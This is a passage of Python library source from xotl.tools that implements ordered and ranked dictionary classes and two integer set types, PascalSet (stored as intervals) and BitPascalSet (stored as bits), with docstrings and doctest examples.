levels.\n\n Example::\n\n >>> sdict = StackedDict(a=1, b=2)\n >>> sdict.push(c=3) # it returns the level...\n 1\n >>> sdict.peek()\n {'c': 3}\n\n \"\"\"\n return dict(self.inner.maps[0])\n\n def __str__(self):\n # TODO: Optimize\n return str(dict(self))\n\n def __repr__(self):\n return \"%s(%s)\" % (type(self).__name__, str(self))\n\n def __len__(self):\n return len(self.inner)\n\n def __iter__(self):\n return iter(self.inner)\n\n def __getitem__(self, key):\n return self.inner[key]\n\n def __setitem__(self, key, value):\n self.inner[key] = value\n\n def __delitem__(self, key):\n del self.inner[key]\n\n\nclass RankedDict(SmartDictMixin, dict):\n \"\"\"Mapping that remembers modification order.\n\n Differences with `OrderedDict`:class: are:\n\n - Can be ranked (change precedence order) at any time; see `rank`:meth:\n and `swap_ranks`:meth: methods for more information.\n\n - Based in modification, not in insertion order.\n\n - Keeps the standard semantics of Python for `popitem`:meth: method\n returning a random pair when called without parameters.\n\n \"\"\"\n\n def __init__(*args, **kwds):\n \"\"\"Initialize a ranked dictionary.\n\n The signature is the same as regular dictionaries, but keyword\n arguments are not recommended because their insertion order is\n arbitrary.\n\n Use `rank`:meth: to change the precedence order in any moment.\n\n \"\"\"\n from xotl.tools.params import issue_9137\n\n self, args = issue_9137(args)\n # Ensure direct calls to ``__init__`` don't clear previous contents\n try:\n self._ranks\n except AttributeError:\n self._ranks = []\n self.update(*args, **kwds)\n\n def rank(self, *keys):\n \"\"\"Arrange mapping keys into a systematic precedence order.\n\n :param keys: Variable number of key values, given are ordered in the\n highest precedence levels (0 is the most priority). 
Not given\n keys are added at the end in the its current order.\n\n \"\"\"\n if keys:\n ranks = []\n for key in keys:\n if key in self:\n ranks.append(key)\n else:\n raise KeyError(\"{}\".format(key))\n aux = set(keys)\n for key in self:\n if key not in aux:\n ranks.append(key)\n self._ranks = ranks\n\n def swap_ranks(self, *args, **kwds):\n \"\"\"Exchange ranks of given keys.\n\n :param args: Each item must be a pair of keys to exchange the order of\n precedence.\n\n :param kwds: Every keyword argument will have a pair to exchange\n (name, value).\n\n \"\"\"\n from xotl.tools.params import check_count\n\n check_count(len(args) + len(kwds) + 1, 2, caller=\"swap_ranks\")\n for key1, key2 in args:\n self._swap_ranks(key1, key2)\n for key1 in kwds:\n key2 = kwds[key1]\n self._swap_ranks(key1, key2)\n\n def move_to_end(self, key, last=True):\n \"\"\"Move an existing element to the end.\n\n Or move it to the beginning if ``last==False``.\n\n Raises KeyError if the element does not exist. When ``last==True``,\n acts like a fast version of ``self[key] = self.pop(key)``.\n\n .. note:: This method is kept for compatibility with\n `OrderedDict`:class:. 
Last example using ``self.pop(key)``\n works well in both, in OD and this class, but here in\n `RankedDict`:class: it's semantically equivalent to\n ``self[key] = self[key]``.\n\n \"\"\"\n try:\n ranks = self._ranks\n if last:\n if key != ranks[-1]:\n ranks.remove(key)\n ranks.append(key)\n else:\n if key != ranks[0]:\n ranks.remove(key)\n ranks.insert(0, key)\n except ValueError:\n raise KeyError(key)\n\n def _swap_ranks(self, key1, key2):\n \"\"\"Protected method to swap a pair of ranks.\"\"\"\n if key1 in self and key2 in self:\n ranks = self._ranks\n idx1, idx2 = ranks.index(key1), ranks.index(key2)\n if idx1 != idx2:\n aux = ranks[idx1]\n ranks[idx1] = ranks[idx2]\n ranks[idx2] = aux\n else:\n raise KeyError(\"{!r} and/or {!r}\".format(key1, key2))\n\n def __setitem__(self, key, value):\n \"\"\"rd.__setitem__(i, y) <==> rd[i]=y\"\"\"\n ranks = self._ranks\n if key in self:\n if ranks[-1] != key:\n ranks.remove(key)\n ranks.append(key)\n else:\n ranks.append(key)\n super().__setitem__(key, value)\n\n def __delitem__(self, key):\n \"\"\"rd.__delitem__(y) <==> del rd[y]\"\"\"\n super().__delitem__(key)\n self._ranks.remove(key)\n\n def __iter__(self):\n \"\"\"rd.__iter__() <==> iter(rd)\"\"\"\n return iter(self._ranks)\n\n def __reversed__(self):\n \"\"\"rd.__reversed__() <==> reversed(rd)\"\"\"\n return reversed(self._ranks)\n\n def clear(self):\n \"\"\"rd.clear() -> None. Remove all items from rd.\"\"\"\n super().clear()\n self._ranks = []\n\n def popitem(self, index=None):\n \"\"\"rd.popitem([index]) -> (key, value), return and remove a pair.\n\n :param index: Position of pair to return (default last). 
This method\n isn't have the same semantic as in `OrderedDict`:class: one,\n none the defined in method with the same name in standard\n Python mappings; here is similar to `~list.pop`:meth:.\n\n \"\"\"\n if self:\n if index is None or index is True:\n index = -1\n key = self._ranks.pop(index)\n return key, super().pop(key)\n else:\n raise KeyError(\"popitem(): dictionary is empty\")\n\n def __sizeof__(self):\n \"\"\"D.__sizeof__() -> size of D in memory, in bytes.\n\n .. note:: Why ``sys.getsizeof(obj)`` doesn't return the same result as\n ``obj.__sizeof__()``?\n\n \"\"\"\n return super().__sizeof__() + self._ranks.__sizeof__()\n\n def keys(self):\n \"\"\"D.keys() -> an object providing a view on D's keys.\"\"\"\n return self.__iter__()\n\n def values(self):\n \"\"\"D.values() -> an object providing a view on D's values.\"\"\"\n for key in self:\n yield self[key]\n\n def items(self):\n \"\"\"D.items() -> an object providing a view on D's items.\"\"\"\n for key in self:\n yield (key, self[key])\n\n def __eq__(self, other):\n \"\"\"rd.__eq__(y) <==> rd==y.\n\n Comparison to another `RankedDict`:class: instance is order-sensitive\n while comparison to a regular mapping is order-insensitive.\n\n \"\"\"\n res = super().__eq__(other)\n if res:\n if isinstance(other, RankedDict):\n return self._ranks == other._ranks\n elif isinstance(other, OrderedDict):\n return self._ranks == list(other)\n else:\n return True\n else:\n return False\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def pop(self, key, *args):\n \"\"\"rd.pop(k[,d]) -> v\n\n Remove specified key and return the corresponding value.\n\n If key is not found, d is returned if given, otherwise KeyError is\n raised.\n\n \"\"\"\n from xotl.tools.params import check_count\n\n count = len(args)\n check_count(count + 1, 1, 2, caller=\"pop\")\n res = super().pop(key, Unset)\n if res is Unset:\n if count == 1:\n return args[0]\n else:\n raise KeyError(key)\n else:\n self._ranks.remove(key)\n return 
res\n\n def setdefault(self, key, default=None):\n \"\"\"D.setdefault(k[,d]) -> D.get(k,d), also set D[k]=d if k not in D\"\"\"\n if key in self:\n return self[key]\n else:\n self[key] = default\n return default\n\n @recursive_repr()\n def __repr__(self):\n \"\"\"x.__repr__() <==> repr(x)\"\"\"\n aux = \", \".join(\"({!r}, {!r})\".format(k, self[k]) for k in self)\n if aux:\n aux = \"[{}]\".format(aux)\n return \"{}({})\".format(type(self).__name__, aux)\n\n def __reduce__(self):\n \"\"\"Return state information for pickling.\"\"\"\n cls = type(self)\n inst_dict = vars(self).copy()\n for k in vars(cls()):\n inst_dict.pop(k, None)\n return cls, (), inst_dict or None, None, iter(self.items())\n\n def copy(self):\n \"\"\"D.copy() -> a shallow copy of D.\"\"\"\n return type(self)(self)\n\n @classmethod\n def fromkeys(cls, iterable, value=None):\n \"\"\"RD.fromkeys(S[, v]) -> New ranked dictionary with keys from S.\n\n If not specified, the value defaults to None.\n\n \"\"\"\n return cls((key, value) for key in iterable)\n\n\nclass OrderedSmartDict(SmartDictMixin, OrderedDict):\n \"\"\"A combination of the `OrderedDict` with the `SmartDictMixin`.\n\n .. warning:: Initializing with kwargs does not ensure any initial ordering,\n since Python's keyword dict is not ordered. 
Use a list/tuple\n of pairs instead.\n\n \"\"\"\n\n def __init__(*args, **kwds):\n \"\"\"Initialize an ordered dictionary.\n\n The signature is the same as regular dictionaries, but keyword\n arguments are not recommended because their insertion order is\n arbitrary.\n\n \"\"\"\n from xotl.tools.params import issue_9137\n\n self, args = issue_9137(args)\n super().__init__()\n self.update(*args, **kwds)\n\n\nclass MetaSet(type):\n \"\"\"Allow syntax sugar creating sets.\n\n This is pythonic syntax (stop limit is never included), for example::\n\n >>> from xotl.tools.future.collections import PascalSet as srange\n >>> [i for i in srange[1:4, 15, 20:23]]\n [1, 2, 3, 15, 20, 21, 22, 23]\n\n \"\"\"\n\n def __getitem__(cls, ranges):\n return cls(*ranges) if isinstance(ranges, tuple) else cls(ranges)\n\n\nclass PascalSet(metaclass=MetaSet):\n \"\"\"Collection of unique integer elements (implemented with intervals).\n\n ::\n\n PascalSet(*others) -> new set object\n\n .. versionadded:: 1.7.1\n\n \"\"\"\n\n __slots__ = (\"_items\",)\n\n def __init__(self, *others):\n \"\"\"Initialize self.\n\n :param others: Any number of integer or collection of integers that\n will be the set members.\n\n \"\"\"\n self._items = [] # a list of list of two elements\n self.update(*others)\n\n def __str__(self):\n def aux(s, e):\n if s == e:\n return str(s)\n elif s + 1 == e:\n return \"%s, %s\" % (s, e)\n else:\n return \"%s..%s\" % (s, e)\n\n l = self._items\n ranges = ((l[i], l[i + 1]) for i in range(0, len(l), 2))\n return str(\"{%s}\" % \", \".join((aux(s, e) for (s, e) in ranges)))\n\n def __repr__(self):\n cls = type(self)\n cname = cls.__name__\n return str(\"%s([%s])\" % (cname, \", \".join((str(i) for i in self))))\n\n def __iter__(self):\n l = self._items\n i, count = 0, len(l)\n while i < count:\n s, e = l[i], l[i + 1]\n while s <= e:\n yield s\n s += 1\n i += 2\n\n def __len__(self):\n res = 0\n l = self._items\n i, count = 0, len(l)\n while i < count:\n res += l[i + 1] - l[i] + 
1\n i += 2\n return res\n\n def __nonzero__(self):\n return bool(self._items)\n\n __bool__ = __nonzero__\n\n def __contains__(self, other):\n \"\"\"True if set has an element ``other``, else False.\"\"\"\n return isinstance(other, int) and self._search(other)[0]\n\n def __hash__(self):\n \"\"\"Compute the hash value of a set.\"\"\"\n return Set._hash(self)\n\n def __eq__(self, other):\n \"\"\"Python 2 and 3 have several differences in operator definitions.\n\n For example::\n\n >>> from xotl.tools.future.collections import PascalSet\n >>> s1 = PascalSet[0:10]\n >>> assert s1 == set(s1) # OK (True) in 2 and 3\n >>> assert set(s1) == s1 # OK in 3, fails in 2\n\n \"\"\"\n if isinstance(other, Set):\n ls, lo = len(self), len(other)\n if ls == lo:\n if isinstance(other, PascalSet):\n return self._items == other._items\n else:\n return self.count(other) == ls\n else:\n return False\n else:\n return False\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __gt__(self, other):\n if isinstance(other, Set):\n if other:\n return self.issuperset(other) and len(self) > len(other)\n else:\n return bool(self._items)\n else:\n return NotImplemented\n\n def __ge__(self, other):\n if isinstance(other, Set):\n if other:\n return self.issuperset(other)\n else:\n return bool(self._items)\n else:\n return NotImplemented\n\n def __lt__(self, other):\n if isinstance(other, Set):\n if other:\n return self.issubset(other) and len(self) < len(other)\n else:\n return not self._items\n else:\n return NotImplemented\n\n def __le__(self, other):\n if isinstance(other, Set):\n if other:\n return self.issubset(other)\n else:\n return not self._items\n else:\n return NotImplemented\n\n def __sub__(self, other):\n if isinstance(other, Set):\n return self.difference(other)\n else:\n return NotImplemented\n\n def __isub__(self, other):\n if isinstance(other, Set):\n self.difference_update(other)\n return self\n else:\n return NotImplemented\n\n def __rsub__(self, other):\n if 
isinstance(other, Set):\n return other - type(other)(self)\n else:\n return NotImplemented\n\n def __and__(self, other):\n if isinstance(other, Set):\n return self.intersection(other)\n else:\n return NotImplemented\n\n def __iand__(self, other):\n if isinstance(other, Set):\n self.intersection_update(other)\n return self\n else:\n return NotImplemented\n\n def __rand__(self, other):\n if isinstance(other, Set):\n return other & type(other)(self)\n else:\n return NotImplemented\n\n def __or__(self, other):\n if isinstance(other, Set):\n return self.union(other)\n else:\n return NotImplemented\n\n def __ior__(self, other):\n if isinstance(other, Set):\n self.update(other)\n return self\n else:\n return NotImplemented\n\n def __ror__(self, other):\n if isinstance(other, Set):\n return other | type(other)(self)\n else:\n return NotImplemented\n\n def __xor__(self, other):\n if isinstance(other, Set):\n return self.symmetric_difference(other)\n else:\n return NotImplemented\n\n def __ixor__(self, other):\n if isinstance(other, Set):\n self.symmetric_difference_update(other)\n return self\n else:\n return NotImplemented\n\n def __rxor__(self, other):\n if isinstance(other, Set):\n return other ^ type(other)(self)\n else:\n return NotImplemented\n\n def count(self, other):\n \"\"\"Number of occurrences of any member of other in this set.\n\n If other is an integer, return 1 if present, 0 if not.\n\n \"\"\"\n if isinstance(other, int):\n return 1 if other in self else 0\n else:\n return sum((i in self for i in other), 0)\n\n def add(self, other):\n \"\"\"Add an element to a set.\n\n This has no effect if the element is already present.\n\n \"\"\"\n self._insert(other)\n\n def union(self, *others):\n \"\"\"Return the union of sets as a new set.\n\n (i.e. 
all elements that are in either set.)\n\n \"\"\"\n res = self.copy()\n res.update(*others)\n return res\n\n def update(self, *others):\n \"\"\"Update a set with the union of itself and others.\"\"\"\n for other in others:\n if isinstance(other, PascalSet):\n l = other._items\n if self._items:\n count = len(l)\n i = 0\n while i < count:\n self._insert(l[i], l[i + 1])\n i += 2\n else:\n self._items = l[:]\n elif isinstance(other, int):\n self._insert(other)\n elif isinstance(other, Iterable):\n for i in other:\n self._insert(i)\n elif isinstance(other, slice):\n start, stop, step = other.start, other.stop, other.step\n if step is None:\n step = 1\n if step in (1, -1):\n stop -= step\n if step == -1:\n start, stop = stop, start\n self._insert(start, stop)\n else:\n for i in range(start, stop, step):\n self._insert(i)\n else:\n raise self._invalid_value(other)\n\n def intersection(self, *others):\n \"\"\"Return the intersection of two or more sets as a new set.\n\n (i.e. elements that are common to all of the sets.)\n\n \"\"\"\n res = self.copy()\n res.intersection_update(*others)\n return res\n\n def intersection_update(self, *others):\n \"\"\"Update a set with the intersection of itself and another.\"\"\"\n l = self._items\n oi, count = 0, len(others)\n while l and oi < count:\n other = others[oi]\n if not isinstance(other, PascalSet):\n # safe mode for intersection\n other = PascalSet(i for i in other if isinstance(i, int))\n o = other._items\n if o:\n sl, el = l[0], l[-1]\n so, eo = o[0], o[-1]\n if sl < so:\n self._remove(sl, so - 1)\n if eo < el:\n self._remove(eo + 1, el)\n i = 2\n while l and i < len(o):\n s, e = o[i - 1] + 1, o[i] - 1\n if s <= e:\n self._remove(s, e)\n i += 2\n else:\n del l[:]\n oi += 1\n\n def difference(self, *others):\n \"\"\"Return the difference of two or more sets as a new set.\n\n (i.e. 
all elements that are in this set but not the others.)\n\n \"\"\"\n res = self.copy()\n res.difference_update(*others)\n return res\n\n def difference_update(self, *others):\n \"\"\"Remove all elements of another set from this set.\"\"\"\n for other in others:\n if isinstance(other, PascalSet):\n l = other._items\n count = len(l)\n i = 0\n while i < count:\n self._remove(l[i], l[i + 1])\n i += 2\n else:\n for i in other:\n if isinstance(i, int):\n self._remove(i)\n\n def symmetric_difference(self, other):\n \"\"\"Return the symmetric difference of two sets as a new set.\n\n (i.e. all elements that are in exactly one of the sets.)\n\n \"\"\"\n res = self.copy()\n res.symmetric_difference_update(other)\n return res\n\n def symmetric_difference_update(self, other):\n \"Update a set with the symmetric difference of itself and another.\"\n if not isinstance(other, PascalSet):\n other = PascalSet(other)\n if self:\n if other:\n # TODO: Implement more efficiently\n aux = other - self\n self -= other\n self |= aux\n else:\n self._items = other._items[:]\n\n def discard(self, other):\n \"\"\"Remove an element from a set if it is a member.\n\n If the element is not a member, do nothing.\n\n \"\"\"\n self._remove(other)\n\n def remove(self, other):\n \"\"\"Remove an element from a set; it must be a member.\n\n If the element is not a member, raise a KeyError.\n\n \"\"\"\n if other in self:\n self._remove(other)\n else:\n raise KeyError('\"%s\" is not a member!' 
% other)\n\n def pop(self):\n \"\"\"Remove and return an arbitrary set element.\n\n Raises KeyError if the set is empty.\n\n \"\"\"\n l = self._items\n if l:\n res = l[0]\n if l[0] < l[1]:\n l[0] += 1\n else:\n del l[0:2]\n return res\n else:\n raise KeyError(\"pop from an empty set!\")\n\n def clear(self):\n \"\"\"Remove all elements from this set.\"\"\"\n self._items = []\n\n def copy(self):\n \"\"\"Return a shallow copy of a set.\"\"\"\n return type(self)(self)\n\n def isdisjoint(self, other):\n \"\"\"Return True if two sets have a null intersection.\"\"\"\n if isinstance(other, PascalSet):\n if self and other:\n l, o = self._items, other._items\n i, lcount, ocount = 0, len(l), len(o)\n maybe = True\n while maybe and i < lcount:\n found, idx = other._search(l[i])\n if idx == ocount: # exhausted\n # assert not found\n i = lcount\n elif found or l[i + 1] >= o[idx]:\n maybe = False\n else:\n i += 2\n return maybe\n else:\n return True\n else:\n return not any(i in self for i in other)\n\n def issubset(self, other):\n \"\"\"Report whether another set contains this set.\"\"\"\n ls = len(self)\n if isinstance(other, PascalSet):\n if self:\n if ls > len(other): # Fast check for obvious cases\n return False\n else:\n l, o = self._items, other._items\n i, lcount = 0, len(l)\n maybe = True\n while maybe and i < lcount:\n found, idx = other._search(l[i])\n if found and l[i + 1] <= o[idx + 1]:\n i += 2\n else:\n maybe = False\n return maybe\n else:\n return True\n elif isinstance(other, Sized) and ls > len(other):\n # Fast check for obvious cases\n return False\n elif isinstance(other, Container):\n aux = next((i for i in self if i not in other), Unset)\n return aux is Unset\n else:\n # Generator cases\n from operator import add\n from functools import reduce\n\n lo = reduce(add, (i in self for i in other), 0)\n return lo == ls\n\n def issuperset(self, other):\n \"\"\"Report whether this set contains another set.\"\"\"\n ls = len(self)\n if isinstance(other, PascalSet):\n 
if other:\n if ls < len(other): # Fast check for obvious cases\n return False\n else:\n l, o = self._items, other._items\n i, ocount = 0, len(o)\n maybe = True\n while maybe and i < ocount:\n found, idx = self._search(o[i])\n if found and o[i + 1] <= l[idx + 1]:\n i += 2\n else:\n maybe = False\n return maybe\n else:\n return True\n elif isinstance(other, Sized) and ls < len(other):\n # Fast check for obvious cases\n return False\n else:\n aux = next((i for i in other if i not in self), Unset)\n return aux is Unset\n\n def _search(self, other):\n \"\"\"Search the pair where ``other`` is placed.\n\n Return a duple :``(if found or not, index)``.\n\n \"\"\"\n if isinstance(other, int):\n l = self._items\n start, end = 0, len(l)\n res, pivot = False, 2 * (end // 4)\n while not res and start < end:\n s, e = l[pivot], l[pivot + 1]\n if other < s:\n end = pivot\n elif other > e:\n start = pivot + 2\n else:\n res = True\n pivot = start + 2 * ((end - start) // 4)\n return res, pivot\n else:\n raise self._invalid_value(other)\n\n def _insert(self, start, end=None):\n \"\"\"Insert an interval of integers.\"\"\"\n if not end:\n end = start\n assert start <= end\n l = self._items\n count = len(l)\n found, idx = self._search(start)\n if not found:\n if idx > 0 and start == l[idx - 1] + 1:\n found = True\n idx -= 2\n l[idx + 1] = start\n if idx < count - 2 and end == l[idx + 2] - 1:\n end = l[idx + 3]\n elif idx < count and end >= l[idx] - 1:\n found = True\n l[idx] = start\n if found:\n while end > l[idx + 1]:\n if idx < count - 2 and end >= l[idx + 2] - 1:\n if end <= l[idx + 3]:\n l[idx + 1] = l[idx + 3]\n del l[idx + 2 : idx + 4]\n count -= 2\n else:\n l[idx + 1] = end\n else:\n if idx < count:\n l.insert(idx, start)\n l.insert(idx + 1, end)\n else:\n l.extend((start, end))\n count += 2\n\n def _remove(self, start, end=None):\n \"\"\"Remove an interval of integers.\"\"\"\n if not end:\n end = start\n assert start <= end\n l = self._items\n sfound, sidx = self._search(start)\n 
efound, eidx = self._search(end)\n if sfound and efound and sidx == eidx:\n first = l[sidx] < start\n last = l[eidx + 1] > end\n if first and last:\n l.insert(eidx + 1, end + 1)\n l.insert(sidx + 1, start - 1)\n elif first:\n l[sidx + 1] = start - 1\n elif last:\n l[eidx] = end + 1\n else:\n del l[sidx : eidx + 2]\n else:\n if sfound and l[sidx] < start:\n l[sidx + 1] = start - 1\n sidx += 2\n if efound:\n if l[eidx + 1] > end:\n l[eidx] = end + 1\n else:\n eidx += 2\n if sidx < eidx:\n del l[sidx:eidx]\n\n def _invalid_value(self, value):\n cls_name = type(self).__name__\n vname = type(value).__name__\n msg = (\n 'Unsupported type for value \"%s\" of type \"%s\" for a \"%s\", '\n \"must be an integer!\"\n )\n return TypeError(msg % (value, vname, cls_name))\n\n @classmethod\n def _prime_numbers_until(cls, limit):\n \"\"\"This is totally a funny test method.\"\"\"\n res = cls[2:limit]\n for i in range(2, limit // 2 + 1):\n if i in res:\n aux = i + i\n while aux < limit:\n if aux in res:\n res.remove(aux)\n aux += i\n return res\n\n\nMutableSet.register(PascalSet)\n\n\nclass BitPascalSet(metaclass=MetaSet):\n \"\"\"Collection of unique integer elements (implemented with bit-wise sets).\n\n ::\n\n BitPascalSet(*others) -> new bit-set object\n\n .. 
versionadded:: 1.7.1\n\n \"\"\"\n\n __slots__ = (\"_items\",)\n _bit_length = 62 # How many values are stored in each item\n\n def __init__(self, *others):\n \"\"\"Initialize self.\n\n :param others: Any number of integer or collection of integers that\n will be the set members.\n\n In this case `_items` is a dictionary with keys containing number\n division seeds and values bit-wise integers (each bit is the division\n modulus position).\n\n \"\"\"\n self._items = {}\n self.update(*others)\n\n def __str__(self):\n if self:\n return str(PascalSet(self))\n else:\n cname = type(self).__name__\n return str(\"%s([])\") % cname\n\n def __repr__(self):\n cname = type(self).__name__\n res = str(\", \").join(str(i) for i in self)\n return str(\"%s([%s])\") % (cname, res)\n\n def __iter__(self):\n bl = self._bit_length\n sm = self._items\n for k in sorted(sm):\n v = sm[k]\n base = k * bl\n i = 0\n ref = 1\n while i < bl:\n if ref & v:\n yield base + i\n ref <<= 1\n i += 1\n\n def __len__(self):\n return sum((1 for i in self), 0)\n\n def __nonzero__(self):\n return bool(self._items)\n\n __bool__ = __nonzero__\n\n def __contains__(self, other):\n \"\"\"True if this bit-set has the element ``other``, else False.\"\"\"\n res = self._search(other)\n if res:\n k, ref, v = res\n return bool(v & (1 << ref))\n else:\n return False\n\n def __hash__(self):\n \"\"\"Compute the hash value of a set.\"\"\"\n return Set._hash(self)\n\n def __eq__(self, other):\n \"\"\"Python 2 and 3 have several differences in operator definitions.\n\n For example::\n\n >>> from xotl.tools.future.collections import BitPascalSet\n >>> s1 = BitPascalSet[0:10]\n >>> assert s1 == set(s1) # OK (True) in 2 and 3\n >>> assert set(s1) == s1 # OK in 3, fails in 2\n\n \"\"\"\n if isinstance(other, Set):\n if isinstance(other, BitPascalSet):\n return self._items == other._items\n else:\n ls, lo = len(self), len(other)\n return ls == lo == self.count(other)\n else:\n return False\n\n def __ne__(self, other):\n return 
not self.__eq__(other)\n\n def __gt__(self, other):\n if isinstance(other, Set):\n if other:\n return self.issuperset(other) and len(self) > len(other)\n else:\n return bool(self._items)\n else:\n return NotImplemented\n\n def __ge__(self, other):\n if isinstance(other, Set):\n return self.issuperset(other) if other else bool(self._items)\n else:\n return NotImplemented\n\n def __lt__(self, other):\n if isinstance(other, Set):\n if other:\n return self.issubset(other) and len(self) < len(other)\n else:\n return not self._items\n else:\n return NotImplemented\n\n def __le__(self, other):\n if isinstance(other, Set):\n return self.issubset(other) if other else not self._items\n else:\n return NotImplemented\n\n def __sub__(self, other):\n if isinstance(other, Set):\n return self.difference(other)\n else:\n return NotImplemented\n\n def __isub__(self, other):\n if isinstance(other, Set):\n self.difference_update(other)\n return self\n else:\n return NotImplemented\n\n def __rsub__(self, other):\n if isinstance(other, Set):\n return other - type(other)(self)\n else:\n return NotImplemented\n\n def __and__(self, other):\n if isinstance(other, Set):\n return self.intersection(other)\n else:\n return NotImplemented\n\n def __iand__(self, other):\n if isinstance(other, Set):\n self.intersection_update(other)\n return self\n else:\n return NotImplemented\n\n def __rand__(self, other):\n if isinstance(other, Set):\n return other & type(other)(self)\n else:\n return NotImplemented\n\n def __or__(self, other):\n if isinstance(other, Set):\n return self.union(other)\n else:\n return NotImplemented\n\n def __ior__(self, other):\n if isinstance(other, Set):\n self.update(other)\n return self\n else:\n return NotImplemented\n\n def __ror__(self, other):\n if isinstance(other, Set):\n return other | type(other)(self)\n else:\n return NotImplemented\n\n def __xor__(self, other):\n if isinstance(other, Set):\n return self.symmetric_difference(other)\n else:\n return 
NotImplemented\n\n def __ixor__(self, other):\n if isinstance(other, Set):\n self.symmetric_difference_update(other)\n return self\n else:\n return NotImplemented\n\n def __rxor__(self, other):\n if isinstance(other, Set):\n return other ^ type(other)(self)\n else:\n return NotImplemented\n\n def count(self, other):\n \"\"\"Number of occurrences of any member of other in this set.\n\n If other is an integer, return 1 if present, 0 if not.\n\n \"\"\"\n if isinstance(other, int):\n return 1 if other in self else 0\n else:\n return sum((i in self for i in other), 0)\n\n def add(self, other):\n \"\"\"Add an element to a bit-set.\n\n This has no effect if the element is already present.\n\n \"\"\"\n self._insert(other)\n\n def union(self, *others):\n \"\"\"Return the union of bit-sets as a new set.\n\n (i.e. all elements that are in either set.)\n\n \"\"\"\n res = self.copy()\n res.update(*others)\n return res\n\n def update(self, *others):\n \"\"\"Update a bit-set with the union of itself and others.\"\"\"\n for other in others:\n if isinstance(other, BitPascalSet):\n sm = self._items\n om = other._items\n for k, v in safe_dict_iter(om).items():\n if k in sm:\n sm[k] |= v\n else:\n sm[k] = v\n elif isinstance(other, int):\n self._insert(other)\n elif isinstance(other, Iterable):\n for i in other:\n self._insert(i)\n elif isinstance(other, slice):\n start, stop, step = other.start, other.stop, other.step\n if step is None:\n step = 1\n for i in range(start, stop, step):\n self._insert(i)\n else:\n raise self._invalid_value(other)\n\n def intersection(self, *others):\n \"\"\"Return the intersection of two or more bit-sets as a new set.\n\n (i.e. 
elements that are common to all of the sets.)\n\n \"\"\"\n res = self.copy()\n res.intersection_update(*others)\n return res\n\n def intersection_update(self, *others):\n \"\"\"Update a bit-set with the intersection of itself and another.\"\"\"\n sm = self._items\n oi, count = 0, len(others)\n while sm and oi < count:\n other = others[oi]\n if not isinstance(other, BitPascalSet):\n # safe mode for intersection\n other = PascalSet(i for i in other if isinstance(i, int))\n om = other._items\n for k, v in safe_dict_iter(sm).items():\n v &= om.get(k, 0)\n if v:\n sm[k] = v\n else:\n del sm[k]\n oi += 1\n\n def difference(self, *others):\n \"\"\"Return the difference of two or more bit-sets as a new set.\n\n (i.e. all elements that are in this set but not the others.)\n\n \"\"\"\n res = self.copy()\n res.difference_update(*others)\n return res\n\n def difference_update(self, *others):\n \"\"\"Remove all elements of another bit-set from this set.\"\"\"\n for other in others:\n if isinstance(other, BitPascalSet):\n sm = self._items\n om = other._items\n for k, v in safe_dict_iter(om).items():\n if k in sm:\n v = sm[k] & ~v\n if v:\n sm[k] = v\n else:\n del sm[k]\n else:\n for i in other:\n if isinstance(i, int):\n self._remove(i)\n\n def symmetric_difference(self, other):\n \"\"\"Return the symmetric difference of two bit-sets as a new set.\n\n (i.e. 
all elements that are in exactly one of the sets.)\n\n \"\"\"\n res = self.copy()\n res.symmetric_difference_update(other)\n return res\n\n def symmetric_difference_update(self, other):\n \"Update a bit-set with the symmetric difference of itself and another.\"\n if not isinstance(other, BitPascalSet):\n other = BitPascalSet(other)\n if self:\n if other:\n # TODO: Implement more efficiently\n aux = other - self\n self -= other\n self |= aux\n else:\n self._items = other._items[:]\n\n def discard(self, other):\n \"\"\"Remove an element from a bit-set if it is a member.\n\n If the element is not a member, do nothing.\n\n \"\"\"\n self._remove(other)\n\n def remove(self, other):\n \"\"\"Remove an element from a bit-set; it must be a member.\n\n If the element is not a member, raise a KeyError.\n\n \"\"\"\n self._remove(other, fail=True)\n\n def pop(self):\n \"\"\"Remove and return an arbitrary bit-set element.\n\n Raises KeyError if the set is empty.\n\n \"\"\"\n sm = self._items\n if sm:\n bl = self._bit_length\n k, v = next(sm.items())\n assert v\n base = k * bl\n i = 0\n ref = 1\n res = None\n while res is None:\n if ref & v:\n res = base + i\n else:\n ref <<= 1\n i += 1\n v &= ~ref\n if v:\n sm[k] = v\n else:\n del sm[k]\n return res\n else:\n raise KeyError(\"pop from an empty set!\")\n\n def clear(self):\n \"\"\"Remove all elements from this bit-set.\"\"\"\n self._items = {}\n\n def copy(self):\n \"\"\"Return a shallow copy of a set.\"\"\"\n return type(self)(self)\n\n def isdisjoint(self, other):\n \"\"\"Return True if two bit-sets have a null intersection.\"\"\"\n if isinstance(other, BitPascalSet):\n sm, om = self._items, other._items\n if sm and om:\n return all(sm.get(k, 0) & v == 0 for k, v in om.items())\n else:\n return True\n else:\n return not any(i in self for i in other)\n\n def issubset(self, other):\n \"\"\"Report whether another set contains this bit-set.\"\"\"\n if isinstance(other, BitPascalSet):\n sm, om = self._items, other._items\n if sm:\n 
return all(om.get(k, 0) & v == v for k, v in sm.items())\n else:\n return True\n elif isinstance(other, Container):\n return not any(i not in other for i in self)\n else:\n # Generator cases\n return sum((i in self for i in other), 0) == len(self)\n\n def issuperset(self, other):\n \"\"\"Report whether this bit set contains another set.\"\"\"\n if isinstance(other, BitPascalSet):\n sm, om = self._items, other._items\n if om:\n return all(sm.get(k, 0) & v == v for k, v in om.items())\n else:\n return True\n else:\n return not any(i not in self for i in other)\n\n def _search(self, other):\n \"\"\"Search the bit-wise value where ``other`` could be placed.\n\n Return a duple :``(seed, bits to shift left)``.\n\n \"\"\"\n if isinstance(other, int):\n sm = self._items\n bl = self._bit_length\n k, ref = divmod(other, bl)\n return k, ref, sm.get(k, 0)\n else:\n return None\n\n def _insert(self, other):\n \"\"\"Add a member in this bit-set.\"\"\"\n aux = self._search(other)\n if aux:\n k, ref, v = aux\n self._items[k] = v | (1 << ref)\n else:\n raise self._invalid_value(other)\n\n def _remove(self, other, fail=False):\n \"\"\"Remove an interval of integers from this bit-set.\"\"\"\n aux = self._search(other)\n ok = False\n if aux:\n k, ref, v = aux\n if v:\n aux = v & ~(1 << ref)\n if v != aux:\n ok = True\n sm = self._items\n if aux:\n sm[k] = aux\n else:\n del sm[k]\n if not ok and fail:\n raise KeyError('\"%s\" is not a member!' 
